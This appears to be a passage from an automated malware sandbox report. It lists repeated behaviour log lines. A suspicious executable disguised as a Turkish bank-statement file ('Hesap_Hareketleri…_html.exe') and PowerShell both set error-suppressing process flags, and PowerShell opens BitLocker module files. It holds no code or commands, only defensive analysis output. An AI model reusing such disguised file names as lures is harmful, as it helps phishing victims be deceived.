Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
